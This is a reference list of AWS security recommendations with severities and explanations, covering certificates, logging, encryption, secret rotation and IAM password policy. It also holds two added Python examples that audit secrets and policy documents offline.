Recommendation: Elastic Load Balancer shouldn't have ACM certificate expired or expiring in 90 days.
Severity: High
Description: This check identifies Elastic Load Balancers (ELB) which are using ACM certificates expired or expiring in 90 days. AWS Certificate Manager (ACM) is the preferred tool to provision, manage, and deploy your server certificates. With ACM you can request a certificate or deploy an existing ACM or external certificate to AWS resources. As a best practice, it's recommended to reimport expiring/expired certificates while preserving the ELB associations of the original certificate.

Recommendation: Elasticsearch domain error logging to CloudWatch Logs should be enabled
Severity: Medium
Description: This control checks whether Elasticsearch domains are configured to send error logs to CloudWatch Logs.

You should enable error logs for Elasticsearch domains and send those logs to CloudWatch Logs for retention and response. Domain error logs can assist with security and access audits, and can help to diagnose availability issues.

Recommendation: Elasticsearch domains should be configured with at least three dedicated master nodes
Severity: Medium
Description: This control checks whether Elasticsearch domains are configured with at least three dedicated master nodes. This control fails if the domain doesn't use dedicated master nodes. This control passes if Elasticsearch domains have five dedicated master nodes. However, using more than three master nodes might be unnecessary to mitigate the availability risk, and will result in more cost.

An Elasticsearch domain requires at least three dedicated master nodes for high availability and fault-tolerance. Dedicated master node resources can be strained during data node blue/green deployments because there are more nodes to manage. Deploying an Elasticsearch domain with at least three dedicated master nodes ensures sufficient master node resource capacity and cluster operations if a node fails.

Recommendation: Elasticsearch domains should have at least three data nodes
Severity: Medium
Description: This control checks whether Elasticsearch domains are configured with at least three data nodes and zoneAwarenessEnabled is true. An Elasticsearch domain requires at least three data nodes for high availability and fault-tolerance. Deploying an Elasticsearch domain with at least three data nodes ensures cluster operations if a node fails.


Recommendation: Elasticsearch domains should have audit logging enabled
Severity: Medium
Description: This control checks whether Elasticsearch domains have audit logging enabled. This control fails if an Elasticsearch domain doesn't have audit logging enabled.

Audit logs are highly customizable. They allow you to track user activity on your Elasticsearch clusters, including authentication successes and failures, requests to OpenSearch, index changes, and incoming search queries.

Recommendation: Enhanced monitoring should be configured for RDS DB instances and clusters
Severity: Low
Description: This control checks whether enhanced monitoring is enabled for your RDS DB instances.

In Amazon RDS, Enhanced Monitoring enables a more rapid response to performance changes in underlying infrastructure. These performance changes could result in a lack of availability of the data. Enhanced Monitoring provides real-time metrics of the operating system that your RDS DB instance runs on. An agent is installed on the instance. The agent can obtain metrics more accurately than is possible from the hypervisor layer. Enhanced Monitoring metrics are useful when you want to see how different processes or threads on a DB instance use the CPU. For more information, see Enhanced Monitoring in the Amazon RDS User Guide.

Recommendation: Ensure rotation for customer created CMKs is enabled
Severity: Medium
Description: AWS Key Management Service (KMS) allows customers to rotate the backing key, which is key material stored within KMS that is tied to the key ID of the customer created customer master key (CMK).

It's the backing key that is used to perform cryptographic operations such as encryption and decryption.

Automated key rotation currently retains all prior backing keys so that decryption of encrypted data can take place transparently. It's recommended that CMK key rotation be enabled.

Rotating encryption keys helps reduce the potential impact of a compromised key, as data encrypted with a new key can't be accessed with a previous key that may have been exposed.


Recommendation: Ensure S3 bucket access logging is enabled on the CloudTrail S3 bucket (Severity: Low)

S3 Bucket Access Logging generates a log that contains access records for each request made to your S3 bucket. An access log record contains details about the request, such as the request type, the resources specified in the request worked, and the time and date the request was processed.

It's recommended that bucket access logging be enabled on the CloudTrail S3 bucket.

By enabling S3 bucket logging on target S3 buckets, it's possible to capture all events that may affect objects within the target buckets. Configuring logs to be placed in a separate bucket allows access to log information, which can be useful in security and incident response workflows.

Recommendation: Ensure the S3 bucket used to store CloudTrail logs isn't publicly accessible (Severity: High)

CloudTrail logs a record of every API call made in your AWS account. These log files are stored in an S3 bucket.

It's recommended that the bucket policy, or access control list (ACL), applied to the S3 bucket that CloudTrail logs to prevents public access to the CloudTrail logs.

Allowing public access to CloudTrail log content may aid an adversary in identifying weaknesses in the affected account's use or configuration.

Recommendation: IAM shouldn't have expired SSL/TLS certificates (Severity: High)

This check identifies expired SSL/TLS certificates. To enable HTTPS connections to your website or application in AWS, you need an SSL/TLS server certificate. You can use ACM or IAM to store and deploy server certificates. Removing expired SSL/TLS certificates eliminates the risk that an invalid certificate will be deployed accidentally to a resource such as AWS Elastic Load Balancer (ELB), which can damage the credibility of the application/website behind the ELB. This check generates alerts if there are any expired SSL/TLS certificates stored in AWS IAM. As a best practice, it's recommended to delete expired certificates.

Recommendation: Imported ACM certificates should be renewed after a specified time period (Severity: Medium)

This control checks whether ACM certificates in your account are marked for expiration within 30 days. It checks both imported certificates and certificates provided by AWS Certificate Manager. ACM can automatically renew certificates that use DNS validation. For certificates that use email validation, you must respond to a domain validation email.

ACM also doesn't automatically renew certificates that you import. You must renew imported certificates manually.

For more information about managed renewal for ACM certificates, see Managed renewal for ACM certificates in the AWS Certificate Manager User Guide.


Recommendation: Over-provisioned identities in accounts should be investigated to reduce the Permission Creep Index (PCI) (Severity: Medium)

Over-provisioned identities in accounts should be investigated to reduce the Permission Creep Index (PCI) and to safeguard your infrastructure. Reduce the PCI by removing the unused high-risk permission assignments. A high PCI reflects the risk associated with identities whose permissions exceed their normal or required usage.

Recommendation: RDS automatic minor version upgrades should be enabled (Severity: High)

This control checks whether automatic minor version upgrades are enabled for the RDS database instance.

Enabling automatic minor version upgrades ensures that the latest minor version updates to the relational database management system (RDBMS) are installed. These upgrades might include security patches and bug fixes. Keeping up to date with patch installation is an important step in securing systems.

Recommendation: RDS cluster snapshots and database snapshots should be encrypted at rest (Severity: Medium)

This control checks whether RDS DB snapshots are encrypted. This control is intended for RDS DB instances. However, it can also generate findings for snapshots of Aurora DB instances, Neptune DB instances, and Amazon DocumentDB clusters. If these findings aren't useful, then you can suppress them. Encrypting data at rest reduces the risk that an unauthenticated user gets access to data that is stored on disk. Data in RDS snapshots should be encrypted at rest for an added layer of security.

Recommendation: RDS clusters should have deletion protection enabled (Severity: Low)

This control checks whether RDS clusters have deletion protection enabled.

This control is intended for RDS DB instances. However, it can also generate findings for Aurora DB instances, Neptune DB instances, and Amazon DocumentDB clusters. If these findings aren't useful, then you can suppress them.

Enabling cluster deletion protection is an additional layer of protection against accidental database deletion or deletion by an unauthorized entity.

When deletion protection is enabled, an RDS cluster can't be deleted. Before a deletion request can succeed, deletion protection must be disabled.

Recommendation: RDS DB clusters should be configured for multiple Availability Zones (Severity: Medium)

RDS DB clusters should be configured for multiple Availability Zones to ensure availability of the data that is stored.

Deployment to multiple Availability Zones allows for automated failover in the event of an Availability Zone availability issue and during regular RDS maintenance events.


Recommendation: RDS DB clusters should be configured to copy tags to snapshots (Severity: Low)

Identification and inventory of your IT assets is a crucial aspect of governance and security.

You need to have visibility of all your RDS DB clusters so that you can assess their security posture and act on potential areas of weakness.

Snapshots should be tagged in the same way as their parent RDS database clusters.

Enabling this setting ensures that snapshots inherit the tags of their parent database clusters.

Recommendation: RDS DB instances should be configured to copy tags to snapshots (Severity: Low)

This control checks whether RDS DB instances are configured to copy all tags to snapshots when the snapshots are created. Identification and inventory of your IT assets is a crucial aspect of governance and security.

You need to have visibility of all your RDS DB instances so that you can assess their security posture and take action on potential areas of weakness.

Snapshots should be tagged in the same way as their parent RDS database instances. Enabling this setting ensures that snapshots inherit the tags of their parent database instances.

Recommendation: RDS DB instances should be configured with multiple Availability Zones (Severity: Medium)

This control checks whether high availability is enabled for your RDS DB instances.

RDS DB instances should be configured for multiple Availability Zones (AZs). This ensures the availability of the data stored. Multi-AZ deployments allow for automated failover if there's an issue with Availability Zone availability and during regular RDS maintenance.

Recommendation: RDS DB instances should have deletion protection enabled (Severity: Low)

This control checks whether your RDS DB instances that use one of the listed database engines have deletion protection enabled. Enabling instance deletion protection is an additional layer of protection against accidental database deletion or deletion by an unauthorized entity.

While deletion protection is enabled, an RDS DB instance can't be deleted. Before a deletion request can succeed, deletion protection must be disabled.


Recommendation: RDS DB instances should have encryption at rest enabled (Severity: Medium)

This control checks whether storage encryption is enabled for your Amazon RDS DB instances.

This control is intended for RDS DB instances. However, it can also generate findings for Aurora DB instances, Neptune DB instances, and Amazon DocumentDB clusters. If these findings aren't useful, then you can suppress them.

For an added layer of security for your sensitive data in RDS DB instances, you should configure your RDS DB instances to be encrypted at rest. To encrypt your RDS DB instances and snapshots at rest, enable the encryption option for your RDS DB instances. Data that is encrypted at rest includes the underlying storage for DB instances, its automated backups, read replicas, and snapshots.

RDS encrypted DB instances use the open standard AES-256 encryption algorithm to encrypt your data on the server that hosts your RDS DB instances. After your data is encrypted, Amazon RDS handles authentication of access and decryption of your data transparently with a minimal impact on performance. You don't need to modify your database client applications to use encryption.

Amazon RDS encryption is currently available for all database engines and storage types. Amazon RDS encryption is available for most DB instance classes. To learn about DB instance classes that don't support Amazon RDS encryption, see Encrypting Amazon RDS resources in the Amazon RDS User Guide.

Recommendation: RDS DB Instances should prohibit public access (Severity: High)

We recommend that you also ensure that access to your RDS instance's configuration is limited to authorized users only, by restricting users' IAM permissions to modify RDS instances' settings and resources.

Recommendation: RDS snapshots should prohibit public access (Severity: High)

We recommend only allowing authorized principals to access the snapshot and change Amazon RDS configuration.


Recommendation: Remove unused Secrets Manager secrets (Severity: Medium)

This control checks whether your secrets have been accessed within a specified number of days. The default value is 90 days. If a secret wasn't accessed within the defined number of days, this control fails.

Deleting unused secrets is as important as rotating secrets. Unused secrets can be abused by their former users, who no longer need access to these secrets. Also, as more users get access to a secret, someone might have mishandled and leaked it to an unauthorized entity, which increases the risk of abuse. Deleting unused secrets helps revoke secret access from users who no longer need it. It also helps to reduce the cost of using Secrets Manager. Therefore, it's essential to routinely delete unused secrets.

Recommendation: S3 buckets should have cross-region replication enabled (Severity: Low)

Enabling S3 cross-region replication ensures that multiple versions of the data are available in different distinct Regions. This allows you to protect your S3 bucket against DDoS attacks and data corruption events.

Recommendation: S3 buckets should have server-side encryption enabled (Severity: Medium)

Enable server-side encryption to protect data in your S3 buckets. Encrypting the data can prevent access to sensitive data in the event of a data breach.

Recommendation: Secrets Manager secrets configured with automatic rotation should rotate successfully (Severity: Medium)

This control checks whether an AWS Secrets Manager secret rotated successfully based on the rotation schedule. The control fails if RotationOccurringAsScheduled is false. The control doesn't evaluate secrets that don't have rotation configured. Secrets Manager helps you improve the security posture of your organization. Secrets include database credentials, passwords, and third-party API keys. You can use Secrets Manager to store secrets centrally, encrypt secrets automatically, control access to secrets, and rotate secrets safely and automatically.

Secrets Manager can rotate secrets. You can use rotation to replace long-term secrets with short-term ones. Rotating your secrets limits how long an unauthorized user can use a compromised secret. For this reason, you should rotate your secrets frequently.

In addition to configuring secrets to rotate automatically, you should ensure that those secrets rotate successfully based on the rotation schedule.

To learn more about rotation, see Rotating your AWS Secrets Manager secrets in the AWS Secrets Manager User Guide.
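The two Secrets Manager rows above (unused secrets, and rotation occurring as scheduled), together with the 90-day rotation row in the next group, all reduce to date arithmetic over fields that Secrets Manager's DescribeSecret call returns. The block below is an added example, not Microsoft's or AWS's code: it applies the three checks to constructed records. The evaluation date, the secret names, and the fallback to CreatedDate for a secret that was never rotated or never accessed are assumptions, not values taken from the page.

```python
"""Added example, not Microsoft's or AWS's code: the three Secrets Manager checks in this
table applied to records shaped like Secrets Manager DescribeSecret output."""
from datetime import datetime, timedelta, timezone

AS_OF = datetime(2023, 7, 24, tzinfo=timezone.utc)   # constructed evaluation time


def rotation_occurring_as_scheduled(secret, as_of=AS_OF):
    """None when rotation is not configured (the control skips such secrets); otherwise
    True if the last successful rotation is no older than the configured interval.
    The real rule's tolerance window is not stated on the page; none is assumed here."""
    if not secret.get("RotationEnabled"):
        return None
    interval = secret["RotationRules"]["AutomaticallyAfterDays"]
    last = secret.get("LastRotatedDate")
    if last is None:            # rotation configured but never completed
        return False
    return as_of - last <= timedelta(days=interval)


def rotated_within(secret, max_age_days=90, as_of=AS_OF):
    """Rotated at least once within max_age_days. A never-rotated secret is aged from
    CreatedDate (assumption), so it fails once it is older than the window."""
    last = secret.get("LastRotatedDate") or secret.get("CreatedDate")
    return last is not None and as_of - last <= timedelta(days=max_age_days)


def unused(secret, max_unused_days=90, as_of=AS_OF):
    """Not accessed for max_unused_days or more; never accessed is aged from CreatedDate."""
    last = secret.get("LastAccessedDate") or secret.get("CreatedDate")
    return last is None or as_of - last >= timedelta(days=max_unused_days)


def evaluate(secrets, as_of=AS_OF):
    """Map each secret name to the list of checks it fails (empty list = compliant)."""
    report = {}
    for secret in secrets:
        failed = []
        if rotation_occurring_as_scheduled(secret, as_of) is False:
            failed.append("rotation not occurring as scheduled")
        if not rotated_within(secret, 90, as_of):
            failed.append("not rotated within 90 days")
        if unused(secret, 90, as_of):
            failed.append("unused for 90 days")
        report[secret["Name"]] = failed
    return report


# Constructed records carrying only the DescribeSecret fields these checks read.
SAMPLE_SECRETS = [
    {"Name": "prod/db/password", "RotationEnabled": True,
     "RotationRules": {"AutomaticallyAfterDays": 30},
     "LastRotatedDate": AS_OF - timedelta(days=12), "LastAccessedDate": AS_OF - timedelta(days=1)},
    {"Name": "prod/api/partner-key", "RotationEnabled": True,       # rotation function failing
     "RotationRules": {"AutomaticallyAfterDays": 30},
     "LastRotatedDate": AS_OF - timedelta(days=45), "LastAccessedDate": AS_OF - timedelta(days=2)},
    {"Name": "legacy/ftp/password", "RotationEnabled": False,        # never rotated, abandoned
     "CreatedDate": AS_OF - timedelta(days=400), "LastAccessedDate": AS_OF - timedelta(days=200)},
    {"Name": "staging/db/password", "RotationEnabled": False,        # rotated by hand, long ago
     "LastRotatedDate": AS_OF - timedelta(days=120), "LastAccessedDate": AS_OF - timedelta(days=3)},
]

if __name__ == "__main__":
    for name, failed in evaluate(SAMPLE_SECRETS).items():
        print(f"{name}: {', '.join(failed) or 'compliant'}")
```

The second record is the case the "rotate successfully" row is about: rotation is configured every 30 days, so the secret is still within the 90-day window of the next group's rule, yet the rotation function has evidently not completed for 45 days and only the scheduled-rotation check catches it.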


Recommendation: Secrets Manager secrets should be rotated within a specified number of days (Severity: Medium)

This control checks whether your secrets have been rotated at least once within 90 days.

Rotating secrets can help you to reduce the risk of an unauthorized use of your secrets in your AWS account. Examples include database credentials, passwords, third-party API keys, and even arbitrary text. If you don't change your secrets for a long period of time, the secrets are more likely to be compromised.

As more users get access to a secret, it can become more likely that someone mishandled and leaked it to an unauthorized entity. Secrets can be leaked through logs and cache data. They can be shared for debugging purposes and not changed or revoked once the debugging completes. For all these reasons, secrets should be rotated frequently.

You can configure your secrets for automatic rotation in AWS Secrets Manager. With automatic rotation, you can replace long-term secrets with short-term ones, significantly reducing the risk of compromise.

Security Hub recommends that you enable rotation for your Secrets Manager secrets. To learn more about rotation, see Rotating your AWS Secrets Manager secrets in the AWS Secrets Manager User Guide.

Recommendation: SNS topics should be encrypted at rest using AWS KMS (Severity: Medium)

This control checks whether an SNS topic is encrypted at rest using AWS KMS.

Encrypting data at rest reduces the risk of data stored on disk being accessed by a user not authenticated to AWS. It also adds another set of access controls to limit the ability of unauthorized users to access the data.

For example, API permissions are required to decrypt the data before it can be read. SNS topics should be encrypted at rest for an added layer of security. For more information, see Encryption at rest in the Amazon Simple Notification Service Developer Guide.

Recommendation: VPC flow logging should be enabled in all VPCs (Severity: Medium)

VPC Flow Logs provide visibility into network traffic that passes through the VPC and can be used to detect anomalous traffic or provide insight during security events.


AWS IdentityAndAccess recommendations

There are 46 AWS recommendations in this category.


Recommendation: Amazon Elasticsearch Service domains should be in a VPC (Severity: High)

VPC cannot contain domains with a public endpoint. Note: this does not evaluate the VPC subnet routing configuration to determine public reachability.

Recommendation: Amazon S3 permissions granted to other AWS accounts in bucket policies should be restricted (Severity: High)

Implementing least privilege access is fundamental to reducing security risk and the impact of errors or malicious intent. If an S3 bucket policy allows access from external accounts, it could result in data exfiltration by an insider threat or an attacker. The 'blacklistedactionpatterns' parameter allows for successful evaluation of the rule for S3 buckets. The parameter grants access to external accounts for action patterns that are not included in the 'blacklistedactionpatterns' list.

Recommendation: Avoid the use of the "root" account (Severity: High)

The "root" account has unrestricted access to all resources in the AWS account. It is highly recommended that the use of this account be avoided.

The "root" account is the most privileged AWS account. Minimizing the use of this account and adopting the principle of least privilege for access management will reduce the risk of accidental changes and unintended disclosure of highly privileged credentials.

Recommendation: AWS KMS keys should not be unintentionally deleted (Severity: High)

This control checks whether KMS keys are scheduled for deletion. The control fails if a KMS key is scheduled for deletion.

KMS keys cannot be recovered once deleted. Data encrypted under a KMS key is also permanently unrecoverable if the KMS key is deleted. If meaningful data has been encrypted under a KMS key scheduled for deletion, consider decrypting the data or re-encrypting the data under a new KMS key unless you are intentionally performing a cryptographic erasure.

When a KMS key is scheduled for deletion, a mandatory waiting period is enforced to allow time to reverse the deletion, if it was scheduled in error. The default waiting period is 30 days, but it can be reduced to as short as 7 days when the KMS key is scheduled for deletion. During the waiting period, the scheduled deletion can be canceled and the KMS key will not be deleted. For additional information regarding deleting KMS keys, see Deleting KMS keys in the AWS Key Management Service Developer Guide.
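The policy conditions described in this table (the row above on S3 permissions granted to other AWS accounts, the earlier row requiring that the CloudTrail S3 bucket not be publicly accessible, and the IAM customer managed policies row at the end of this page on kms:Decrypt over all KMS keys) can all be evaluated offline against a policy document. The block below is an added example, not Defender for Cloud's, Security Hub's or AWS Config's code. The parameter name blacklisted_action_patterns mirrors the page's wording, but the pattern-matching semantics are an assumption; the account IDs, bucket name and key ID are constructed placeholders.

```python
"""Added example, not Microsoft's or AWS's code: evaluate IAM and S3 bucket policy documents
for the two conditions described in this table. Parameter semantics are assumptions."""
import fnmatch


def _as_list(value):
    """Policy elements may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return list(value) if isinstance(value, list) else [value]


def _pattern_overlap(a, b):
    """True if two IAM action patterns can name the same action (either side may use '*')."""
    a, b = a.lower(), b.lower()
    return fnmatch.fnmatchcase(a, b) or fnmatch.fnmatchcase(b, a)


def _action_granted(statement, action):
    """Whether an Allow statement's Action/NotAction element covers `action`."""
    target = action.lower()
    if "NotAction" in statement:
        return not any(fnmatch.fnmatchcase(target, p.lower()) for p in _as_list(statement["NotAction"]))
    return any(fnmatch.fnmatchcase(target, p.lower()) for p in _as_list(statement.get("Action")))


def _principal_accounts(principal):
    """Account IDs named by a Principal element. Anonymous access ('*') is returned as '*'.
    Service and Federated principals carry no external account and are ignored."""
    if principal == "*":
        return {"*"}
    accounts = set()
    for entry in (_as_list(principal.get("AWS")) if isinstance(principal, dict) else []):
        if entry == "*":
            accounts.add("*")
        elif entry.startswith("arn:aws:iam::"):
            accounts.add(entry.split(":")[4])   # arn:aws:iam::<account>:root | user/... | role/...
        elif entry.isdigit() and len(entry) == 12:
            accounts.add(entry)
    return accounts


def external_account_grants(bucket_policy, own_account, blacklisted_action_patterns):
    """(account, action) pairs where an Allow statement grants an action matching a blacklisted
    pattern to a principal outside own_account. Account '*' means anonymous access, which is
    the condition the CloudTrail-bucket row above forbids."""
    findings = []
    for stmt in _as_list(bucket_policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        for account in sorted(_principal_accounts(stmt.get("Principal", {}))):
            if account == own_account:
                continue
            for action in _as_list(stmt.get("Action")):
                if any(_pattern_overlap(action, pat) for pat in blacklisted_action_patterns):
                    findings.append((account, action))
    return findings


KMS_DECRYPT_ACTIONS = ("kms:Decrypt", "kms:ReEncryptFrom")


def allows_kms_decrypt_on_all_keys(policy):
    """True if any Allow statement grants kms:Decrypt or kms:ReEncryptFrom (directly, via
    'kms:*' or '*', or via a NotAction that fails to exclude them) on Resource '*'."""
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or "*" not in _as_list(stmt.get("Resource")):
            continue
        if any(_action_granted(stmt, action) for action in KMS_DECRYPT_ACTIONS):
            return True
    return False


OWN_ACCOUNT = "111111111111"   # constructed account ID

# Constructed bucket policy: the owning account, a second account, and the CloudTrail service.
SAMPLE_BUCKET_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
     "Action": ["s3:GetObject", "s3:PutObject"], "Resource": "arn:aws:s3:::example-trail-bucket/*"},
    {"Effect": "Allow", "Principal": {"AWS": ["arn:aws:iam::222222222222:role/LogReader"]},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-trail-bucket/*"},
    {"Effect": "Allow", "Principal": {"Service": "cloudtrail.amazonaws.com"},
     "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-trail-bucket/AWSLogs/*"},
]}

# Constructed IAM customer managed policies: the failing shape beside a least-privilege shape.
BROAD_KMS_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["kms:Decrypt", "kms:DescribeKey"], "Resource": "*"}]}
SCOPED_KMS_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "kms:Decrypt",
     "Resource": "arn:aws:kms:us-east-1:111111111111:key/PLACEHOLDER-KEY-ID"}]}

if __name__ == "__main__":
    print(external_account_grants(SAMPLE_BUCKET_POLICY, OWN_ACCOUNT, ["s3:Get*", "s3:Delete*"]))
    print(allows_kms_decrypt_on_all_keys(BROAD_KMS_POLICY), allows_kms_decrypt_on_all_keys(SCOPED_KMS_POLICY))
```

Two design points matter for a defender reading the results: the CloudTrail service principal is deliberately not reported as an external account, since a trail bucket has to accept PutObject from it, and the KMS check looks at NotAction as well as Action, because an Allow with NotAction "s3:*" on Resource "*" grants every KMS action even though the string "kms" appears nowhere in the statement.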


Recommendation: AWS WAF Classic global web ACL logging should be enabled (Severity: Medium)

This control checks whether logging is enabled for an AWS WAF global Web ACL. This control fails if logging is not enabled for the web ACL.

Logging is an important part of maintaining the reliability, availability, and performance of AWS WAF globally. It is a business and compliance requirement in many organizations, and allows you to troubleshoot application behavior. It also provides detailed information about the traffic that is analyzed by the web ACL that is attached to AWS WAF.

Recommendation: CloudFront distributions should have a default root object configured (Severity: High)

This control checks whether an Amazon CloudFront distribution is configured to return a specific object that is the default root object. The control fails if the CloudFront distribution does not have a default root object configured.

A user might sometimes request the distribution's root URL instead of an object in the distribution. When this happens, specifying a default root object can help you to avoid exposing the contents of your web distribution.

Recommendation: CloudFront distributions should have origin access identity enabled (Severity: Medium)

This control checks whether an Amazon CloudFront distribution with Amazon S3 Origin type has Origin Access Identity (OAI) configured. The control fails if OAI is not configured.

CloudFront OAI prevents users from accessing S3 bucket content directly. When users access an S3 bucket directly, they effectively bypass the CloudFront distribution and any permissions that are applied to the underlying S3 bucket content.

Recommendation: CloudTrail log file validation should be enabled (Severity: Low)

To ensure additional integrity checking of CloudTrail logs, we recommend enabling file validation on all CloudTrail trails.

Recommendation: CloudTrail should be enabled (Severity: High)

AWS CloudTrail is a web service that records AWS API calls for your account and delivers log files to you. Not all services enable logging by default for all APIs and events.

You should implement any additional audit trails other than CloudTrail and review the documentation for each service in CloudTrail Supported Services and Integrations.


Recommendation: CloudTrail trails should be integrated with CloudWatch Logs (Severity: Low)

In addition to capturing CloudTrail logs within a specified S3 bucket for long-term analysis, real-time analysis can be performed by configuring CloudTrail to send logs to CloudWatch Logs.

For a trail that is enabled in all regions in an account, CloudTrail sends log files from all those regions to a CloudWatch Logs log group. We recommend that CloudTrail logs be sent to CloudWatch Logs to ensure AWS account activity is being captured, monitored, and appropriately alarmed on.

Sending CloudTrail logs to CloudWatch Logs facilitates real-time and historic activity logging based on user, API, resource, and IP address, and provides the opportunity to establish alarms and notifications for anomalous or sensitive account activity.

Recommendation: Database logging should be enabled (Severity: Medium)

This control checks whether the following logs of Amazon RDS are enabled and sent to CloudWatch Logs:

- Oracle: (Alert, Audit, Trace, Listener)

- PostgreSQL: (Postgresql, Upgrade)

- MySQL: (Audit, Error, General, SlowQuery)

- MariaDB: (Audit, Error, General, SlowQuery)

- SQL Server: (Error, Agent)

- Aurora: (Audit, Error, General, SlowQuery)

- Aurora-MySQL: (Audit, Error, General, SlowQuery)

- Aurora-PostgreSQL: (Postgresql, Upgrade)

RDS databases should have relevant logs enabled. Database logging provides detailed records of requests made to RDS. Database logs can assist with security and access audits and can help to diagnose availability issues.

Recommendation: Disable direct internet access for Amazon SageMaker notebook instances (Severity: High)

Direct internet access should be disabled for a SageMaker notebook instance.

This checks whether the 'DirectInternetAccess' field is disabled for the notebook instance.

Your instance should be configured with a VPC and the default setting should be Disable - Access the internet through a VPC.

In order to enable internet access to train or host models from a notebook, make sure that your VPC has a NAT gateway and your security group allows outbound connections. Ensure access to your SageMaker configuration is limited to only authorized users, and restrict users' IAM permissions to modify SageMaker settings and resources.


Recommendation: Do not set up access keys during initial user setup for all IAM users that have a console password (Severity: Medium)

The AWS console defaults the checkbox for creating access keys to enabled. This results in many access keys being generated unnecessarily.

In addition to unnecessary credentials, it also generates unnecessary management work in auditing and rotating these keys.

Requiring that additional steps be taken by the user after their profile has been created will give a stronger indication of intent that access keys are [a] necessary for their work and [b] once the access key is established on an account that the keys may be in use somewhere in the organization.

Recommendation: Ensure a support role has been created to manage incidents with AWS Support (Severity: Low)

AWS provides a support center that can be used for incident notification and response, as well as technical support and customer services.

Create an IAM Role to allow authorized users to manage incidents with AWS Support.

By implementing least privilege for access control, an IAM Role will require an appropriate IAM Policy to allow Support Center Access in order to manage Incidents with AWS Support.

Recommendation: Ensure access keys are rotated every 90 days or less (Severity: Medium)

Access keys consist of an access key ID and secret access key, which are used to sign programmatic requests that you make to AWS.

AWS users need their own access keys to make programmatic calls to AWS from the AWS Command Line Interface (AWS CLI), Tools for Windows PowerShell, the AWS SDKs, or direct HTTP calls using the APIs for individual AWS services.

It is recommended that all access keys be regularly rotated. Rotating access keys will reduce the window of opportunity for an access key that is associated with a compromised or terminated account to be used.

Access keys should be rotated to ensure that data cannot be accessed with an old key which might have been lost, cracked, or stolen.


Recommendation: Ensure AWS Config is enabled in all regions (Severity: Medium)

AWS Config is a web service that performs configuration management of supported AWS resources within your account and delivers log files to you.

The recorded information includes the configuration item (AWS resource), relationships between configuration items (AWS resources), and any configuration changes between resources.

It is recommended that AWS Config be enabled in all regions.

The AWS configuration item history captured by AWS Config enables security analysis, resource change tracking, and compliance auditing.

Recommendation: Ensure CloudTrail is enabled in all regions (Severity: High)

AWS CloudTrail is a web service that records AWS API calls for your account and delivers log files to you.

The recorded information includes the identity of the API caller, the time of the API call, the source IP address of the API caller, the request parameters, and the response elements returned by the AWS service. CloudTrail provides a history of AWS API calls for an account, including API calls made via the Management Console, SDKs, command line tools, and higher-level AWS services (such as CloudFormation).

The AWS API call history produced by CloudTrail enables security analysis, resource change tracking, and compliance auditing. Additionally,

* ensuring that a multi-region trail exists will ensure that unexpected activity occurring in otherwise unused regions is detected

* ensuring that a multi-region trail exists will ensure that "Global Service Logging" is enabled for a trail by default to capture recording of events generated on AWS global services

* for a multi-region trail, ensuring that management events are configured for all types of Read/Writes ensures recording of management operations that are performed on all resources in an AWS account.

Recommendation: Ensure credentials unused for 90 days or greater are disabled (Severity: Medium)

AWS IAM users can access AWS resources using different types of credentials, such as passwords or access keys.

It is recommended that all credentials that have been unused for 90 or more days be removed or deactivated.

Disabling or removing unnecessary credentials will reduce the window of opportunity for credentials associated with a compromised or abandoned account to be used.


Recommendation: Ensure IAM password policy expires passwords within 90 days or less (Severity: Low)

IAM password policies can require passwords to be rotated or expired after a given number of days.

It is recommended that the password policy expire passwords after 90 days or less.

Reducing the password lifetime increases account resiliency against brute force login attempts. Additionally, requiring regular password changes helps in the following scenarios:

* Passwords can be stolen or compromised sometimes without your knowledge. This can happen via a system compromise, software vulnerability, or internal threat.

* Certain corporate and government web filters or proxy servers have the ability to intercept and record traffic even if it's encrypted.

* Many people use the same password for many systems such as work, email, and personal.

* Compromised end user workstations might have a keystroke logger.

Recommendation: Ensure IAM password policy prevents password reuse (Severity: Low)

IAM password policies can prevent the reuse of a given password by the same user.

It is recommended that the password policy prevent the reuse of passwords.

Preventing password reuse increases account resiliency against brute force login attempts.

Recommendation: Ensure IAM password policy requires at least one lowercase letter (Severity: Medium)

Password policies are, in part, used to enforce password complexity requirements. IAM password policies can be used to ensure passwords are composed of different character sets.

It is recommended that the password policy require at least one lowercase letter.

Setting a password complexity policy increases account resiliency against brute force login attempts.

Recommendation: Ensure IAM password policy requires at least one number (Severity: Medium)

Password policies are, in part, used to enforce password complexity requirements. IAM password policies can be used to ensure passwords are composed of different character sets.

It is recommended that the password policy require at least one number.

Setting a password complexity policy increases account resiliency against brute force login attempts.


Recommendation: Ensure IAM password policy requires at least one symbol (Severity: Medium)

Password policies are, in part, used to enforce password complexity requirements.

IAM password policies can be used to ensure passwords are composed of different character sets.

It is recommended that the password policy require at least one symbol.

Setting a password complexity policy increases account resiliency against brute force login attempts.

Recommendation: Ensure IAM password policy requires at least one uppercase letter (Severity: Medium)

Password policies are, in part, used to enforce password complexity requirements. IAM password policies can be used to ensure passwords are composed of different character sets.

It is recommended that the password policy require at least one uppercase letter.

Setting a password complexity policy increases account resiliency against brute force login attempts.

Recommendation: Ensure IAM password policy requires minimum length of 14 or greater (Severity: Medium)

Password policies are, in part, used to enforce password complexity requirements. IAM password policies can be used to ensure passwords are at least a given length.

It is recommended that the password policy require a minimum password length of 14.

Setting a password complexity policy increases account resiliency against brute force login attempts.

Recommendation: Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password (Severity: Medium)

Multi-Factor Authentication (MFA) adds an extra layer of protection on top of a user name and password.

With MFA enabled, when a user signs in to an AWS website, they will be prompted for their user name and password as well as for an authentication code from their AWS MFA device.

It is recommended that MFA be enabled for all accounts that have a console password.

Enabling MFA provides increased security for console access as it requires the authenticating principal to possess a device that emits a time-sensitive key and have knowledge of a credential.

Recommendation: GuardDuty should be enabled (Severity: Medium)

To provide additional protection against intrusions, GuardDuty should be enabled on your AWS account and region.

Note: GuardDuty might not be a complete solution for every environment.
